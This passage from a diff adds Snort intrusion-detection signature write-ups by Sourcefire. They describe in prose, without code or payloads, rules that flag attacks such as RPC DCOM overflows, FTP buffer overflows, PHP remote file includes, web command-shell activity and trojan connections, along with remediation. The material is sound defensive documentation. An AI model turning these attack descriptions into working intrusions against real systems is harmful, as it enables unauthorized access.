+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+--
--- /dev/null
+++ b/doc/signatures/2333.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+2333
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an FTP server.
+
+--
+Impact:
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for a user to supply data to an FTP ommand and have it
+interpreted as code. The attacker might then be able to run code of
+their choosing with the privileges of the user running the FTP service.
+
+--
+Affected Systems:
+	PlatinumFTP PlatinumFTPserver 1.0.18
+
+--
+Attack Scenarios:
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a 
+host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1592.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1592
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1352.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1352
+
+--
+Summary:
+Attempted tclsh command access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to execute a tclsh command or script on a webserver. tclsh is a shell application that reads tcl commands and evaluates them. The attacker could possibly execute a command or script on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'tclsh'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1351
+
+--
--- /dev/null
+++ b/doc/signatures/3060.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3060
+
+--
+Summary:
+This event is generated when an attempt is made to initiate a TLS
+connection via SSL version 2.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule indicates that an attempt has been made to initiate a TLS
+connection via SSL v2. This rule should not generate an event.
+
+--
+Affected Systems:
+	All implementations using SSL.
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000839.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000839
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHP Event Calendar" application running on a webserver. Access to the file "calendar.php" using a remote file being passed as the "path_to_calendar" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path_to_calendar" parameter in the "calendar.php" script used by the "PHP Event Calendar" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Event Calendar
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3127.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3127
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2143.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2143
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the cafelog php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in the cafelog PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the gm-2-b2.php script.
+
+--
+Affected Systems:
+Any host using cafelog.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via gm-2-b2.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2701.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2701
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3223.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3223
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/153.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+153
+
+--
+Summary:
+Donald Dick is a Trojan Horse allowing the attacker to access various 
+resources on the victim host. This event is generated when the attackers
+client connects to the Trojan server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows NT
+
+The Trojan changes system registry settings to add the Donald Dick 
+server to programs normally started on boot. Due to the nature of this 
+Trojan it is unlikely that the attacker's client IP address has been 
+spoofed.
+
+The default name of the server application is vmldir.vxd.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\VxD\
+
+Registry keys added:
+
+	VMLDR
+
+This contains the key StaticVxD = "vmldir.vxd"
+
+Delete the registry key VMLDR.
+
+Delete the Troajn application vmldir.vxd.
+
+A reboot of the infected machine is needed.
+
+--
+Contributors:
+Original rule written by unknown persons.
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/miscfix/dd.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/847.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+847
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/317.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 317
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in mountd.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+Some implementations of the Network File System (NFS) on Linux systems use a vulnerable version of mountd that is subject to a buffer overflow condition in the logging subsystem.
+
+The mountd logging facility also logs failed attempts to mount shared resources, even if NFS is not enabled on the system. This means that exploitation of this issue is possible wether or not NFS is being used.
+
+Affected Systems:
+	Caldera OpenLinux Standard 1.2
+	RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/121
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+CERT:
+http://www.cert.org/advisories/CA-1998-12.html
+http://www.cert.org/summaries/CS-98-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/1515.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1515
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2043.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2043
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Internet Security Association and Key Management 
+Protocol (ISAKMP).
+
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+This event indicates that a key exchange using ISAKMP failed.
+
+--
+Affected Systems:
+All systems using cryptographic key exchange as an authentication 
+method.
+
+--
+Attack Scenarios:
+The attacker may have a store of keys associated with valid users and 
+may attempt to authenticate using a combination of username and key.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+A user may mistype a username or may be trying to authenticate using an 
+expired key.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Ensure that key exchanges are only allowed between trusted hosts.
+
+Check log files for disallowed login attempts.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
--- /dev/null
+++ b/doc/signatures/698.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+698
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000454.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000454
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "New Category" parameter in the "edtalbum.asp" 
+script used by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1728.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1728
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in the ftp server included with version 2.6 of the Sun Solaris operating system.
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+An error in the ftp daemon supplied with version 2.6 of Sun's Solaris operating system can cause the daemon to overflow a buffer and generate a core file that is world readable.
+
+The attacker may also be able to fill the disk partition by generating core files.
+
+--
+Affected Systems:
+Sun Solaris 2.6
+
+--
+Attack Scenarios:
+An attacker can use a non-standard ftp client or initiate a session with the ftp server and issue a CWD ~ command. The attacker may then be able to read the core file and recover usernames and passwords for other users on the system
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/494.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 494
+
+-- 
+Summary:
+This event is generated by a successful attempt to execute a command. This may be indicative of post-compromise behavior indicating the use of a Windows command shell.
+
+-- 
+
+Impact:
+Serious. An attacker may have the ability to execute commands remotely
+
+--
+Detailed Information:
+This event is generated by an unsuccessful attempt to execute a Windows command which generates the response "The command completed successfully". For example, it is generated in Windows 2000/XP after the "net" command (such as "net use") is used. The net commands are used for a wide variety of system tasks of interest to attackers and can be started from the windows shell (cmd.exe, command.com). 
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has sucessfully executed a command. Note that the source address of this event is actually the victim and not that of the attacker.
+
+--
+
+Attack Scenarios:
+An attacker gains an access to a Windows web server via IIS vulnerability and manages to start a cmd.exe shell. He then proceeds to map the DMZ network via "net use" commands.
+
+-- 
+
+Ease of Attack:
+Simple. This post-attack behavior can accompany different attacks.
+
+-- 
+
+False Positives:
+This rule will generate an event if the string "Command completed" appears in the content distributed by the web server, in which case the rule should be tuned.
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Investigate the web server for signs of compromise.
+
+Look for other IDS events involving the same IP addresses.
+
+--
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft Technet:
+http://www.microsoft.com/technet/prodtechnol/windows2000serv/support/FAQW2KCP.asp
+
+--
--- /dev/null
+++ b/doc/signatures/570.txt
@@ -0,0 +1,71 @@
+SID:
+570
+--
+
+Rule:
+--
+
+Summary:
+This event indicates an attempt to exploit the tool talk RPC database 
+service
+--
+
+Impact:
+Possible unauthorized administrative access to the server or application
+or a denial of service to the affected application
+--
+
+Detailed Information:
+ToolTalk RPC database service (rpc.ttdbserverd) does not perform 
+adequate input validation or provide a format string specifier argument 
+when writing to syslog. This means a specifically crafted RPC request to
+the ToolTalk RPC database service overwriting specific locations in 
+memory and therefore allowing execution of code with the same permission
+level as the user running ttdbserverd, usually root.
+--
+
+Affected Systems:
+	HP-UX 10.10 - 11.0
+	AIX 4.1 - 4.3
+	IRIX 5.2 - 6.4
+	Solaris 1.1 - 2.6
+	TriTeal TED CDE 4.3
+	Xi Graphics Maximum CDE 1.2.3
+	
+Possibly other vendors, if you are running Tool Talk (rpc.ttdbserverd) check with your vendor.
+--
+
+Attack Scenarios:
+An attacker will send a specially crafted RPC call to the 
+rpc.ttdbserverd daemon running on an affected system. A sucessful 
+attack will then run code on the server with the access level of the 
+root user.
+--
+
+Ease of Attack:
+Simple, Exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Updates packages and patches are available from vendors, install them or
+disable the service if not needed.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/3255.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3255
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1974.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1974
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with CesarFTPD FTP server REST command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists with the REST command that can cause a buffer overflow and permit the execution of arbitrary commands with system privileges. The buffer overflow can be caused by supplying an overly long argument to the REST command.
+
+--
+Affected Systems:
+Hosts running CesarFTP 0.98b.
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the REST command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0826
+
+--
--- /dev/null
+++ b/doc/signatures/157.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+152, 157-158
+
+--
+Summary:
+Backdoor.Backconstruction is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Backconstruction
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+	SID	Message
+	---	-------
+	152	BackConstruction 2.1 Connection (outgoing TCP
+connection)
+	157	BackConstruction 2.1 Client FTP Open Request (incoming
+TCP connection)
+	158	BackConstruction 2.1 Server FTP Open Reply (outging TCP
+connection)
+
